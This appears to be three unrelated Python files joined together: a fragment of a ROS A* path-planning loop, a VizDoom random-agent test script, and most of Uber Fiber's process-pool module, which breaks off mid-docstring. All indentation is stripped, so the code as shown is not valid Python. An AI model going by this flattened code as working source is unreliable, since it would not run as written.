x, y = cnode.pos[0], cnode.pos[1]
for os in offsets:
x_new, y_new = x + os[0], y + os[1]
pos_new = (x_new, y_new)
# 判断是否在地图范围内,超出范围跳过
nodes_neighbor.append(Node(pos_new))
return nodes_neighbor
def give_start_and_end():
return tuple((0, 0)), tuple((40, 0)),
def vx_vy(pos_now, pos_next):
e = tuple((pos_next[1]-pos_now[1], pos_next[0]-pos_now[0]))
d = math.sqrt(e[0]**2+e[1]**2)
e = tuple((e[0]/d, e[1]/d))
vx = e[0]
vy = e[1]
return vx, vy
def check(blocklist, routelist):
for block in blocklist:
if block in routelist:
return -1
return 1
def moving():
while True:
pose_now = rospy.wait_for_message("/Odom",Odometry,timeout=rospy.Duration(3.0))
# 根据routelist 完成运动指令的发布
def programming(n_bl, n_b, routelist):
mapsize = MAPSIZE
pos_now, pos_end = give_start_and_end()
pcl_raw = rospy.wait_for_message("/PointClouds", PointCloud2, timeout=rospy.Duration(3.0))
pcd = pc2.read_points_list(pcl_raw, field_names=("x", "y"), skip_nans=True)
create_block = Blocklist(SCALE, pcd, n_b, n_bl, maxrank=MAXRANK)
n_bl, n_b = create_block.pcd_discretization()
if len(routelist) == 0 or check(n_bl, routelist) == -1:
myastar = AStar(mapsize, pos_now, pos_end) # 类的初始化
myastar.setblock(n_bl)
myastar.run()
routelist = myastar.get_minroute()
vis = Visualization(n_bl, pos_now, pos_end, mapsize=mapsize, routelist=routelist)
vis.visual()
return n_bl, n_b, routelist
def main():
# if init:
# pcl_raw = rospy.wait_for_message("/ObstaclePoints",PointCloud2,timeout=rospy.Duration(3.0))
# pcd_last = pc2.read_points_list(pcl_raw,field_names=("x","y"),skip_nans=True)
# else:
pass
if __name__ == "__main__":
now_blocklist = list()
now_blocks = list()
now_routelist = list()
rospy.init_node("decision")
#thread1 = threading.Thread(target=moving)
# thread1.start()
while True:
now_blocklist, now_blocks, now_routelist = programming(now_blocklist, now_blocks, now_routelist)
|
test_cig_planet_vs_player.py
|
# Copyright 2019 The PlaNet Authors. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import gym
from gym_vizdoom import (LIST_OF_ENVS, EXPLORATION_GOAL_FRAME, GOAL_REACHING_REWARD)
import vizdoomgym
from multiprocessing import Process
from threading import Thread
import time
def run_agent(a_id):
print(f"making {a_id}")
env = gym.make("VizdoomCig-v0", agent_id=a_id, agents_total=2, port=5030)
env.imitation = False
policy = lambda env, obs: env.action_space.sample()
done = False
steps = 0
env.reset()
while True:
env.step(env.action_space.sample())
pass
agents = []
# host = Process(target=run_agent, args=(str(0)))
# host.start()
# player2 = Process(target=run_agent, args=(str(1)))
# player2.start()
player3 = Process(target=run_agent, args=(str(4)))
player3.start()
# run_agent(0)
input()
|
pool.py
|
#
# Module providing the `Pool` class for managing a process pool
#
# multiprocessing/pool.py
#
# Copyright (c) 2006-2008, R Oudkerk
# Licensed to PSF under a Contributor Agreement.
#
# Modifications Copyright (c) 2020 Uber Technologies
"""
*Pools* are supported by Fiber. They allow the user to manage a pool of
worker processes. Fiber extend pools with *job-backed processes* so that it can
manage thousands of (remote) workers per pool. Users can also create multiple
pools at the same time.
Fiber implements 2 different version of `Pool`: `ZPool` and `ResilientZPool`.
Both has the same API as `multiprocessing.Pool`. `ZPool` is pool based on
"r"/"w" socket pairs.
`ResilientZPool` is `ZPool` + [error handling](advanced.md#error-handling).
Failed tasks will be resubmitted to the Pool and worked on by other pool
workers.
By default, `ResilientZPool` is exposed as `fiber.Pool`.
Example:
```python
pool = fiber.Pool(processes=4)
pool.map(math.sqrt, range(10))
```
"""
import logging
import multiprocessing as mp
import multiprocessing.pool as mp_pool
import multiprocessing.util as mp_util
import pickle
import math
import queue
import random
import struct
import threading
import sys
import time
import secrets
import traceback
from multiprocessing.pool import (CLOSE, RUN, TERMINATE,
ExceptionWithTraceback, MaybeEncodingError,
ThreadPool, _helper_reraises_exception)
import fiber.queues
import fiber.config as config
from fiber.backend import get_backend
from fiber.queues import LazyZConnection
from fiber.socket import Socket
from fiber.process import current_process
import signal
logger = logging.getLogger('fiber')
MIN_PORT = 40000
MAX_PORT = 65535
def safe_join_worker(proc):
p = proc
if p.is_alive():
# worker has not yet exited
logger.debug('cleaning up worker %s' % p.pid)
p.join(5)
def safe_terminate_worker(proc):
delay = random.random()
# Randomize start time to prevent overloading the server
logger.debug(
"start multiprocessing.pool.worker terminator thread for proc %s "
"with delay %s", proc.name, delay)
time.sleep(delay)
p = proc
if p.exitcode is None:
p.terminate()
logger.debug("safe_terminate_worker() finished")
def safe_start(proc):
try:
proc.start()
proc._start_failed = False
except Exception:
msg = traceback.format_exc()
logging.warning("failed to start process %s: %s", proc.name, msg)
# Set this so that this process can be cleaned up later
proc._start_failed = True
def mp_worker_core(inqueue, outqueue, maxtasks=None, wrap_exception=False):
logger.debug('mp_worker_core running')
put = outqueue.put
get = inqueue.get
completed = 0
while maxtasks is None or (maxtasks and completed < maxtasks):
try:
task = get()
except (EOFError, OSError):
logger.debug('worker got EOFError or OSError -- exiting')
break
if task is None:
logger.debug('worker got sentinel -- exiting')
break
job, i, func, args, kwds = task
try:
result = (True, func(*args, **kwds))
except Exception as e:
if wrap_exception and func is not _helper_reraises_exception:
e = ExceptionWithTraceback(e, e.__traceback__)
result = (False, e)
try:
put((job, i, result))
except Exception as e:
wrapped = MaybeEncodingError(e, result[1])
logger.debug("Possible encoding error while sending result: %s" % (
wrapped))
put((job, i, (False, wrapped)))
task = job = result = func = args = kwds = None
completed += 1
logger.debug('worker exiting after %s tasks' % completed)
def mp_worker(inqueue, outqueue, initializer=None, initargs=(), maxtasks=None,
wrap_exception=False, num_workers=1):
"""This is mostly the same as multiprocessing.pool.worker, the difference
is that it will start multiple workers (specified by `num_workers` argument)
via multiproccessing and allow the Fiber pool worker to take multiple CPU
cores.
"""
assert maxtasks is None or (type(maxtasks) == int and maxtasks > 0)
if hasattr(inqueue, '_writer'):
inqueue._writer.close()
outqueue._reader.close()
if initializer is not None:
initializer(*initargs)
workers = []
for i in range(num_workers):
# Use fork context to make sure that imported modules and other things
# are shared. This is useful when modules share objects between
# processes.
ctx = mp.get_context('fork')
p = ctx.Process(target=mp_worker_core,
args=(inqueue, outqueue, maxtasks, wrap_exception))
p.start()
workers.append(p)
for w in workers:
w.join()
class ClassicPool(mp_pool.Pool):
@staticmethod
def Process(ctx, *args, **kwds):
return fiber.process.Process(*args, **kwds)
def __init__(self, processes=None, initializer=None, initargs=(),
maxtasksperchild=None, cluster=None):
self._ctx = None
self._setup_queues()
self._taskqueue = queue.Queue()
self._cache = {}
self._state = RUN
self._maxtasksperchild = maxtasksperchild
self._initializer = initializer
self._initargs = initargs
if processes is None:
processes = 1
if processes < 1:
raise ValueError("Number of processes must be at least 1")
if initializer is not None and not callable(initializer):
raise TypeError("initializer must be a callable")
self._processes = processes
self._pool = []
self._threads = []
self._repopulate_pool()
# Worker handler
self._worker_handler = threading.Thread(
target=ClassicPool._handle_workers,
args=(self._cache, self._taskqueue, self._ctx, self.Process,
self._processes, self._pool, self._threads, self._inqueue,
self._outqueue, self._initializer, self._initargs,
self._maxtasksperchild, self._wrap_exception)
)
self._worker_handler.daemon = True
self._worker_handler._state = RUN
self._worker_handler.start()
logger.debug(
"Pool: started _handle_workers thread(%s:%s)",
self._worker_handler.name, self._worker_handler.ident
)
# Task handler
# NOTE: Fiber socket is not thread safe. SimpleQueue is built with Fiber
# socket, so it shouldn't be shared between different threads. But
# here _quick_put and _inqueue are only accessed by _task_handler
# except when the Pool is terminated and `_terminate` is called.
self._task_handler = threading.Thread(
target=ClassicPool._handle_tasks,
args=(self._taskqueue, self._quick_put, self._outqueue,
self._pool, self._cache)
)
self._task_handler.daemon = True
self._task_handler._state = RUN
self._task_handler.start()
logger.debug(
"Pool: started _handle_tasks thread(%s:%s)",
self._task_handler.name, self._task_handler.ident
)
# Result handler
self._result_handler = threading.Thread(
target=ClassicPool._handle_results,
args=(self._outqueue, self._quick_get, self._cache)
)
self._result_handler.daemon = True
self._result_handler._state = RUN
self._result_handler.start()
logger.debug(
"Pool: started _handle_results thread(%s:%s)",
self._result_handler.name, self._result_handler.ident
)
# TODO use fiber's own weak ref
self._terminate = mp_util.Finalize(
self, self._terminate_pool,
args=(self._taskqueue, self._inqueue, self._outqueue, self._pool,
self._threads, self._worker_handler, self._task_handler,
self._result_handler, self._cache),
exitpriority=15
)
logger.debug("Pool: registered _terminate_pool finalizer")
def _setup_queues(self):
self._inqueue = fiber.queues.SimpleQueue()
logger.debug("Pool|created Pool._inqueue: %s", self._inqueue)
self._outqueue = fiber.queues.SimpleQueue()
logger.debug("Pool|created Pool._outqueue: %s", self._outqueue)
# TODO(jiale) use send_string instead?
self._quick_put = self._inqueue.put
# TODO(jiale) can't use _outqueue.reader.get because _outqueue.reader
# is a REQ socket. It can't be called consecutively.
self._quick_get = self._outqueue.get
def _map_async(self, func, iterable, mapper, chunksize=None, callback=None,
error_callback=None):
"""
Helper function to implement map, starmap and their async counterparts.
"""
if self._state != RUN:
raise ValueError("Pool not running")
if not hasattr(iterable, '__len__'):
iterable = list(iterable)
if chunksize is None:
# use self._processes to replace len(self._pool) to calculate
# chunk size. This is because len(self._pool) is the number
# of jobs not total processes.
chunksize, extra = divmod(len(iterable), self._processes * 4)
if extra:
chunksize += 1
if len(iterable) == 0:
chunksize = 0
task_batches = ClassicPool._get_tasks(func, iterable, chunksize)
result = mp_pool.MapResult(self._cache, chunksize, len(iterable),
callback, error_callback=error_callback)
self._taskqueue.put(
(
self._guarded_task_generation(result._job,
mapper,
task_batches),
None
)
)
return result
@staticmethod
def _handle_workers(cache, taskqueue, ctx, Process, processes, pool,
threads, inqueue, outqueue, initializer, initargs,
maxtasksperchild, wrap_exception):
thread = threading.current_thread()
# Keep maintaining workers until the cache gets drained, unless the
# pool is terminated.
while thread._state == RUN or (cache and thread._state != TERMINATE):
ClassicPool._maintain_pool(ctx, Process, processes, pool, threads,
inqueue, outqueue, initializer, initargs,
maxtasksperchild, wrap_exception)
time.sleep(0.1)
logger.debug("_handle_workers exits")
@staticmethod
def _join_exited_workers(pool):
"""Cleanup after any worker processes which have exited due to reaching
their specified lifetime. Returns True if any workers were cleaned up.
"""
cleaned = False
thread = threading.current_thread()
for i in reversed(range(len(pool))):
# leave dead workers for later cleaning
if getattr(thread, "_state", None) == TERMINATE:
logger.debug("pool is being terminated, "
"leave dead workers for later cleaning")
break
worker = pool[i]
if worker._start_failed:
cleaned = True
del pool[i]
logger.debug("remove process %s which failed to "
"start", worker.name)
continue
logger.debug("check worker.exitcode %s", worker.name)
if worker.exitcode is not None:
# worker exited
worker.join()
cleaned = True
del pool[i]
return cleaned
def _repopulate_pool(self):
return self._repopulate_pool_static(self._ctx, self.Process,
self._processes,
self._pool, self._threads,
self._inqueue,
self._outqueue, self._initializer,
self._initargs,
self._maxtasksperchild,
self._wrap_exception)
@staticmethod
def _repopulate_pool_static(ctx, Process, processes, pool, threads,
inqueue, outqueue, initializer, initargs,
maxtasksperchild, wrap_exception):
"""Bring the number of pool processes up to the specified number,
for use after reaping workers which have exited.
"""
logger.debug("_repolulate_pool_static, pool: %s", pool)
thread = threading.current_thread()
workers_per_fp = config.cpu_per_job
remain = processes - len(pool) * workers_per_fp
while remain > 0:
# don't repolulate workers if exiting
logger.debug(
"processes %s, len(pool) %s",
processes, len(pool)
)
if getattr(thread, "_state", None) == TERMINATE:
logger.debug("pool is being terminated, stop "
"repopulating workers")
break
num_workers = (
workers_per_fp if remain >= workers_per_fp else remain
)
w = Process(ctx, target=mp_worker,
args=(inqueue, outqueue,
initializer,
initargs, maxtasksperchild,
wrap_exception, num_workers))
pool.append(w)
remain = remain - num_workers
w.name = w.name.replace('Process', 'PoolWorker')
w.daemon = True
td = threading.Thread(target=safe_start, args=(w,))
td.start()
threads.append(td)
logger.debug("start multiprocessing.pool.worker starter "
"thread(%s:%s)",
td.name, td.ident)
logger.debug("_repolulate_pool_static done, pool: %s", pool)
@staticmethod
def _maintain_pool(ctx, Process, processes, pool, threads, inqueue,
outqueue, initializer, initargs, maxtasksperchild,
wrap_exception):
"""Clean up any exited workers and start replacements for them.
"""
if ClassicPool._join_exited_workers(pool):
ClassicPool._repopulate_pool_static(ctx, Process, processes, pool,
threads, inqueue, outqueue,
initializer, initargs,
maxtasksperchild,
wrap_exception)
@staticmethod
def _handle_tasks(taskqueue, put, outqueue, pool, cache):
thread = threading.current_thread()
for taskseq, set_length in iter(taskqueue.get, None):
task = None
try:
# iterating taskseq cannot fail
for task in taskseq:
if thread._state:
break
try:
put(task)
except Exception as e:
job, idx = task[:2]
try:
cache[job]._set(idx, (False, e))
except KeyError:
pass
else:
if set_length:
idx = task[1] if task else -1
set_length(idx + 1)
continue
break
finally:
task = taskseq = job = None
else:
logger.debug('_handle_tasks: task handler got sentinel')
try:
# tell result handler to finish when cache is empty
logger.debug('_handle_tasks: task handler sending sentinel '
'to result handler')
outqueue.put(None)
# tell workers there is no more work
logger.debug('_handle_tasks: task handler sending sentinel '
'to workers')
for p in pool:
put(None)
except OSError:
logger.debug('_handle_tasks: task handler got OSError when '
'sending sentinels')
logger.debug('_handle_tasks: task handler exiting')
@staticmethod
def _handle_results(outqueue, get, cache):
thread = threading.current_thread()
while 1:
try:
task = get()
except (OSError, EOFError):
# logger.debug('result handler got EOFError/OSError: exiting')
return
if thread._state:
assert thread._state == TERMINATE
# logger.debug('result handler found thread._state=TERMINATE')
break
if task is None:
# logger.debug('result handler got sentinel')
break
job, i, obj = task
try:
cache[job]._set(i, obj)
except KeyError:
pass
task = job = obj = None
while cache and thread._state != TERMINATE:
try:
task = get()
except (OSError, EOFError):
logger.debug('result handler got EOFError/OSError -- exiting')
return
if task is None:
logger.debug('result handler ignoring extra sentinel')
continue
job, i, obj = task
try:
cache[job]._set(i, obj)
except KeyError:
pass
task = job = obj = None
if hasattr(outqueue, '_reader'):
logger.debug('ensuring that outqueue is not full')
# If we don't make room available in outqueue then
# attempts to add the sentinel (None) to outqueue may
# block. There is guaranteed to be no more than 2 sentinels.
try:
for i in range(10):
if not outqueue._reader.poll():
break
get()
except (OSError, EOFError):
pass
logger.debug('result handler exiting: len(cache)=%s, thread._state=%s',
len(cache), thread._state)
@classmethod
def _terminate_pool(cls, taskqueue, inqueue, outqueue, pool, threads,
worker_handler, task_handler, result_handler, cache):
# this is guaranteed to only be called once
logger.debug('finalizing pool')
start = time.time()
terminate_start = start
worker_handler._state = TERMINATE
task_handler._state = TERMINATE
logger.debug('helping task handler/workers to finish')
assert result_handler.is_alive() or len(cache) == 0
result_handler._state = TERMINATE
outqueue.put(None) # sentinel
# This was previously done in _handle_workers, we move it here to
# improve terminating speed
logger.debug("send sentinel, put None in task queue")
taskqueue.put(None)
elapsed = time.time() - start
start = start + elapsed
logger.debug("outqueue put None took %s", elapsed)
# Since worker_handler._state is already set, not more new processes
# will be created. So we don't need to wait for worker_handler.
# Original comments below doesn't apply anymore. They are kept here
# for reference.
#
# Original comment: We must wait for the worker handler to exit before
# terminating workers because we don't want workers to be restarted
# behind our back.
# logger.debug('joining worker handler')
# if threading.current_thread() is not worker_handler:
# worker_handler.join()
elapsed = time.time() - start
start = start + elapsed
logger.debug("joining worker handler took %s", elapsed)
logger.debug('tell process._popen that it should exit')
for p in pool:
if p._popen is not None:
logger.debug('set process._popen._exiting = True '
'for %s', p.name)
p._popen._exiting = True
elapsed = time.time() - start
start = start + elapsed
logger.debug("setting p._popen._exiting took %s", elapsed)
logger.debug('joining starter threads')
for td in threads:
# wait for all starter threads to finish
logger.debug('joining starter thread %s', td.name)
td.join()
logger.debug('joining starter thread finished')
elapsed = time.time() - start
start = start + elapsed
logger.debug("joining starter threads took %s", elapsed)
N = min(100, len(pool))
# Thread pool used for process termination. With randomized delay, this
# roughly equals N requests per second.
tpool = ThreadPool(N)
# Terminate workers which haven't already finished.
if pool and hasattr(pool[0], 'terminate'):
logger.debug('terminating workers')
tpool.map_async(safe_terminate_worker, pool)
elapsed = time.time() - start
start = start + elapsed
logger.debug("run safe_terminate_worker threads took %s", elapsed)
logger.debug('joining task handler')
if threading.current_thread() is not task_handler:
task_handler.join()
elapsed = time.time() - start
start = start + elapsed
logger.debug("joining task handler took %s", elapsed)
logger.debug('joining result handler')
if threading.current_thread() is not result_handler:
result_handler.join()
elapsed = time.time() - start
start = start + elapsed
logger.debug("joining result handler took %s", elapsed)
tpool = ThreadPool(N)
if pool and hasattr(pool[0], 'terminate'):
logger.debug('joining pool workers, this may take some '
'time. workers: %s', pool)
tpool.map(safe_join_worker, pool)
elapsed = time.time() - start
start = start + elapsed
logger.debug("joining pool workers took %s", elapsed)
logger.debug(
"terminating pool finished. it took %s",
time.time() - terminate_start
)
class Inventory():
"""An inventory object that holds map results.
An `seq` needs to be requested with `add` method so that map result can
be tracked. `seq` acts as an request id. In later stage, `get` method
can be called with corresponding `seq`. This inventory will handle waiting,
managing results from different map calls.
"""
def __init__(self, queue_get):
self._seq = 0
self._queue_get = queue_get
self._inventory = {}
self._spec = {}
self._idx_cur = {}
def add(self, ntasks):
self._seq += 1
self._inventory[self._seq] = [None] * ntasks
self._spec[self._seq] = ntasks
self._idx_cur[self._seq] = 0
return self._seq
def get(self, job_seq):
n = self._spec[job_seq]
while n != 0:
# seq, batch, batch + i, result
seq, _, i, result = self._queue_get()
self._inventory[seq][i] = result
self._spec[seq] -= 1
if seq == job_seq:
n = self._spec[seq]
ret = self._inventory[job_seq]
self._inventory[job_seq] = None
return ret
def iget_unordered(self, job_seq):
n = self._spec[job_seq]
while n != 0:
# seq, batch, batch + i, result
seq, _, i, result = self._queue_get()
self._inventory[seq][i] = result
self._spec[seq] -= 1
if seq == job_seq:
res = self._inventory[job_seq][i]
self._inventory[job_seq][i] = None
n = self._spec[seq]
yield res
return
def iget_ordered(self, job_seq):
idx = self._idx_cur[job_seq]
total = len(self._inventory[job_seq])
while idx != total:
if self._inventory[job_seq][idx] is not None:
res = self._inventory[job_seq][idx]
self._inventory[job_seq][idx] = None
idx += 1
self._spec[job_seq] = idx
yield res
continue
# seq, batch, batch + i, result
seq, _, i, result = self._queue_get()
self._inventory[seq][i] = result
if seq == job_seq:
if i == idx:
# got the next one
res = self._inventory[job_seq][i]
self._inventory[job_seq][i] = None
idx += 1
self._spec[job_seq] = idx
yield res
return
class MapResult():
def __init__(self, seq, inventory):
self._seq = seq
self._inventory = inventory
def get(self):
return self._inventory.get(self._seq)
def iget_ordered(self):
return self._inventory.iget_ordered(self._seq)
def iget_unordered(self):
return self._inventory.iget_unordered(self._seq)
class ApplyResult(MapResult):
"""An object that is returned by asynchronous methods of `Pool`. It
represents an handle that can be used to get the actual result.
"""
def get(self):
"""Get the actual result represented by this object
:returns: Actual result. This method will block if the actual result
is not ready.
"""
return self._inventory.get(self._seq)[0]
def zpool_worker_core(master_conn, result_conn, maxtasksperchild,
wrap_exception, rank=-1, req=False):
"""
The actual function that processes tasks.
:param master_conn: connection that is used to read task from Pool.
:param result_conn: connection that is used to send results to Pool.
:param maxtasksperchild: TODO: max tasks per child process.
"param wrap_exception: TODO
"param rank: used when zpool_worker started many zpool_worker_core
processes. `rank` is the id of this process.
"pram req": whether master_conn is based on a REQ type socket. When this
flag is set, `zpool_worker_core` needs to request tasks from the Pool
by send it's (ident, proc.id) to the Pool and Pool will send a task
back to the worker. This doesn't change result_conn.
"""
logger.debug("zpool_worker_core started %s", rank)
proc = None
ident = secrets.token_bytes(4)
if req:
proc = current_process()
while True:
if req:
# master_conn is a REQ type socket, need to send id (rank) to
# master to request a task. id is packed in type unsigned short (H)
master_conn.send_bytes(struct.pack("4si", ident, proc.pid))
#print("worker_core send", ident, proc.pid)
task = master_conn.recv()
if task is None:
logger.debug("task worker got None, exiting")
break
seq, batch, func, arg_list, starmap = task
logger.debug('zpool_worker got %s, %s, %s, %s', seq, batch,
func, arg_list)
if len(arg_list) == 0:
continue
if starmap:
for i, arg_item in enumerate(arg_list):
nargs = len(arg_item)
if nargs == 2:
args, kwds = arg_item
res = func(*args, **kwds)
elif nargs == 1:
args = arg_item[0]
res = func(*args)
else:
raise ValueError("Bad number of args, %s %s",
nargs, arg_item)
data = (seq, batch, batch + i, res)
if req:
data += (ident,)
result_conn.send(data)
else:
for i, args in enumerate(arg_list):
res = func(args)
data = (seq, batch, batch + i, res)
if req:
data += (ident,)
result_conn.send(data)
#print("worker_core exit, ", rank, proc.pid)
def handle_signal(signal, frame):
# run sys.exit() so that atexit handlers can run
sys.exit()
def zpool_worker(master_conn, result_conn, initializer=None, initargs=(),
maxtasks=None, wrap_exception=False, num_workers=1, req=False):
"""
The entry point of Pool worker function.
:param master_conn: connection that is used to read task from Pool.
:param result_conn: connection that is used to send results to Pool.
:param maxtasksperchild: TODO: max tasks per child process.
:param wrap_exception: TODO
:param num_workers: number of workers to start.
:param rank: used when zpool_worker started many zpool_worker_core
processes. `rank` is the id of this process.
:param req: whether master_conn is based on a REQ type socket. When this
flag is set, `zpool_worker_core` needs to request tasks from the Pool
by send it's (ident, proc.id) to the Pool and Pool will send a task
back to the worker. This doesn't change result_conn.
"""
logger.debug("zpool_worker running")
signal.signal(signal.SIGTERM, handle_signal)
if wrap_exception:
# TODO(jiale) implement wrap_exception
raise NotImplementedError
assert maxtasks is None or (type(maxtasks) == int and maxtasks > 0)
if initializer is not None:
initializer(*initargs)
if num_workers == 1:
return zpool_worker_core(master_conn, result_conn, maxtasks,
wrap_exception, 0, req=req)
workers = []
for i in range(num_workers):
# Use fork context to make sure that imported modules and other things
# are shared. This is useful when modules share objects between
# processes.
ctx = mp.get_context('fork')
p = ctx.Process(target=zpool_worker_core,
args=(master_conn, result_conn, maxtasks,
wrap_exception, i, req), daemon=True)
p.start()
workers.append(p)
for w in workers:
w.join()
class ZPool():
"""A Pool implementation based on Fiber sockets.
ZPool directly uses Fiber sockets instead of SimpleQueue for tasks and
results handling. This makes it faster.
"""
def __init__(self, processes=None, initializer=None, initargs=(),
maxtasksperchild=None, cluster=None,
master_sock_type="w"):
self._pool = []
self._processes = processes
self._initializer = initializer
self._initargs = initargs
self._maxtasksperchild = maxtasksperchild
self._cluster = cluster
self._seq = 0
self._state = RUN
self.taskq = queue.Queue()
self.sent_tasks = 0
self.recv_tasks = 0
self.max_processing_tasks = 20000
# networking related
backend = get_backend()
ip, _, _ = backend.get_listen_addr()
socket = Socket(mode=master_sock_type)
_master_port = socket.bind()
_master_addr = 'tcp://{}:{}'.format(ip, _master_port)
self._master_addr = _master_addr
self._master_sock = socket
socket = Socket(mode="r")
_result_port = socket.bind()
_result_addr = 'tcp://{}:{}'.format(ip, _result_port)
self._result_addr = _result_addr
self._result_sock = socket
logger.debug("creating %s", self)
self._inventory = Inventory(self._res_get)
logger.debug("%s, starting workers", self)
td = threading.Thread(
target=self.__class__._handle_workers, args=(self,)
)
td.daemon = True
td._state = RUN
# `td` will be started later by `lazy_start_workers` later
self._worker_handler = td
self._worker_handler_started = False
# launch task handler
td = threading.Thread(
target=self._handle_tasks,
)
td.daemon = True
td._state = RUN
td.start()
self._task_handler = td
def __repr__(self):
return "<{}({}, {})>".format(
type(self).__name__,
getattr(self, "_processes", None),
getattr(self, "_master_addr", None),
)
def _handle_tasks(self):
taskq = self.taskq
master_sock = self._master_sock
while True:
if self.sent_tasks - self.recv_tasks > self.max_processing_tasks:
time.sleep(0.2)
continue
task = taskq.get()
data = pickle.dumps(task)
master_sock.send(data)
self.sent_tasks += 1
def _task_put(self, task):
self.taskq.put(task)
def _res_get(self):
payload = self._result_sock.recv()
self.recv_tasks += 1
data = pickle.loads(payload)
return data
@staticmethod
def _join_exited_workers(workers):
thread = threading.current_thread()
logger.debug("ZPool _join_exited_workers running, workers %s, "
"thread._state %s", workers, thread._state)
exited_workers = []
for i in reversed(range(len(workers))):
if thread._state != RUN:
break
worker = workers[i]
if worker._start_failed:
exited_workers.append(worker)
del workers[i]
logger.debug("ZPool _join_exited_workers running, "
"worker._start_failed +1 %s", worker)
continue
if worker.exitcode is not None:
worker.join()
exited_workers.append(worker)
del workers[i]
logger.debug("ZPool _join_exited_workers running, "
"worker.join() done +1 %s", worker)
continue
logger.debug("ZPool _join_exited_workers finished, workers %s, "
"exited %s", workers, exited_workers)
return exited_workers
@staticmethod
def _maintain_workers(processes, workers, master_addr, result_addr, initializer,
initargs, maxtasksperchild):
thread = threading.current_thread()
workers_per_fp = config.cpu_per_job
left = processes - len(workers)
logger.debug("ZPool _maintain_workers running, workers %s", workers)
threads = []
while left > 0 and thread._state == RUN:
if left > workers_per_fp:
n = workers_per_fp
else:
n = left
master_conn = LazyZConnection(("r", master_addr))
result_conn = LazyZConnection(("w", result_addr))
master_conn.set_name("master_conn")
w = fiber.process.Process(target=zpool_worker,
args=(master_conn,
result_conn,
initializer,
initargs,
maxtasksperchild,
False,
n),
daemon=False)
w.name = w.name.replace("Process", "PoolWorker")
td = threading.Thread(target=safe_start, args=(w,))
td.start()
threads.append(td)
logger.debug("started safe_start thread %s", td)
# w.start()
logger.debug("started proc %s", w)
workers.append(w)
left -= n
for td in threads:
logger.debug("joining safe_start thread %s", td)
td.join(2)
logger.debug("joining safe_start thread %s finished", td)
logger.debug("ZPool _maintain_workers finished, workers %s", workers)
@staticmethod
def _handle_workers(pool):
logger.debug("%s _handle_workers running", pool)
td = threading.current_thread()
ZPool._maintain_workers(
pool._processes, pool._pool,
pool._master_addr, pool._result_addr, pool._initializer,
pool._initargs, pool._maxtasksperchild
)
while td._state == RUN:
if len(ZPool._join_exited_workers(pool._pool)) > 0:
# create new workers when old workers exited
ZPool._maintain_workers(
pool._processes, pool._pool,
pool._master_addr, pool._result_addr, pool._initializer,
pool._initargs, pool._maxtasksperchild
)
time.sleep(0.5)
logger.debug("%s _handle_workers finished. Status is not RUN",
pool)
@staticmethod
def _chunks(iterable, size):
for i in range(0, len(iterable), size):
yield iterable[i:i + size]
def apply_async(self, func, args=(), kwds={}, callback=None,
error_callback=None):
"""
Run function `func` with arguments `args` and keyword arguments `kwds`
on a remote Pool worker. This is an asynchronous version of `apply`.
:param func: target function to run.
:param args: positional arguments that needs to be passed to `func`.
:param kwds: keyword arguments that needs to be passed to `func`.
:param callback: Currently not supported. A callback function that will
be called when the result is ready.
:param error_callback: Currently not supported. A callback function
that will be called when an error occurred.
:returns: An ApplyResult object which has a method `.get()` to get
the actual results.
"""
if self._state != RUN:
raise ValueError("Pool is not running")
# assert kwds == {}, 'kwds not supported yet'
self.lazy_start_workers(func)
seq = self._inventory.add(1)
self._task_put((seq, 0, func, [(args, kwds)], True))
res = ApplyResult(seq, self._inventory)
return res
def start_workers(self):
self._worker_handler.start()
self._worker_handler_started = True
def lazy_start_workers(self, func):
if hasattr(func, "__fiber_meta__"):
if (
not hasattr(zpool_worker, "__fiber_meta__")
or zpool_worker.__fiber_meta__ != func.__fiber_meta__
):
if self._worker_handler_started:
raise RuntimeError(
"Cannot run function that has different resource "
"requirements acceptable by this pool. Try creating a "
"different pool for it."
)
zpool_worker.__fiber_meta__ = func.__fiber_meta__
if not self._worker_handler_started:
self.start_workers()
def map_async(self, func, iterable, chunksize=None, callback=None,
error_callback=None):
"""
For each element `e` in `iterable`, run `func(e)`. The workload is
distributed between all the Pool workers. This is an asynchronous
version of `map`.
:param func: target function to run.
:param iterable: an iterable object to be mapped.
:param chunksize: if set, elements in `iterable` will be put in to
chunks whose size is decided by `chunksize`. These chunks will be
sent to Pool workers instead of each elements in `iterable`. If not
set, the chunksize is decided automatically.
:param callback: Currently not supported. A callback function that will
be called when the result is ready.
:param error_callback: Currently not supported. A callback function
that will be called when an error occurred.
:returns: An MapResult object which has a method `.get()` to get
the actual results.
"""
if error_callback:
# TODO(jiale) implement error callback
raise NotImplementedError
if self._state != RUN:
raise ValueError("Pool is not running")
if chunksize is None:
chunksize = 32
if not hasattr(iterable, '__len__'):
iterable = list(iterable)
self.lazy_start_workers(func)
seq = self._inventory.add(len(iterable))
chunks = self.__class__._chunks(iterable, chunksize)
for batch, chunk in enumerate(chunks):
self._task_put((seq, batch * chunksize, func, chunk, False))
res = MapResult(seq, self._inventory)
return res
def apply(self, func, args=(), kwds={}):
"""
Run function `func` with arguments `args` and keyword arguments `kwds`
on a remote Pool worker.
:param func: target function to run.
:param args: positional arguments that needs to be passed to `func`.
:param kwds: keyword arguments that needs to be passed to `func`.
:returns: the return value of `func(*args, **kwargs)`.
"""
return self.apply_async(func, args, kwds).get()
def map(self, func, iterable, chunksize=None):
"""
For each element `e` in `iterable`, run `func(e)`. The workload is
distributed between all the Pool workers.
:param func: target function to run.
:param iterable: an iterable object to be mapped.
:param chunksize: if set, elements in `iterable` will be put in to
chunks whose size is decided by `chunksize`. These chunks will be
sent to Pool workers instead of each elements in `iterable`. If not
set, the chunksize is decided automatically.
:returns: A list of results equivalent to calling
`[func(x) for x in iterable]`.
"""
logger.debug('%s map func=%s', self, func)
return self.map_async(func, iterable, chunksize).get()
def imap(self, func, iterable, chunksize=1):
"""
For each element `e` in `iterable`, run `func(e)`. The workload is
distributed between all the Pool workers. This function returns an
iterator which user and iterate over to get results.
:param func: target function to run.
:param iterable: an iterable object to be mapped.
:param chunksize: if set, elements in `iterable` will be put in to
chunks whose size is decided by `chunksize`. These chunks will be
sent to Pool workers instead of each elements in `iterable`. If not
set, the chunksize is decided automatically.
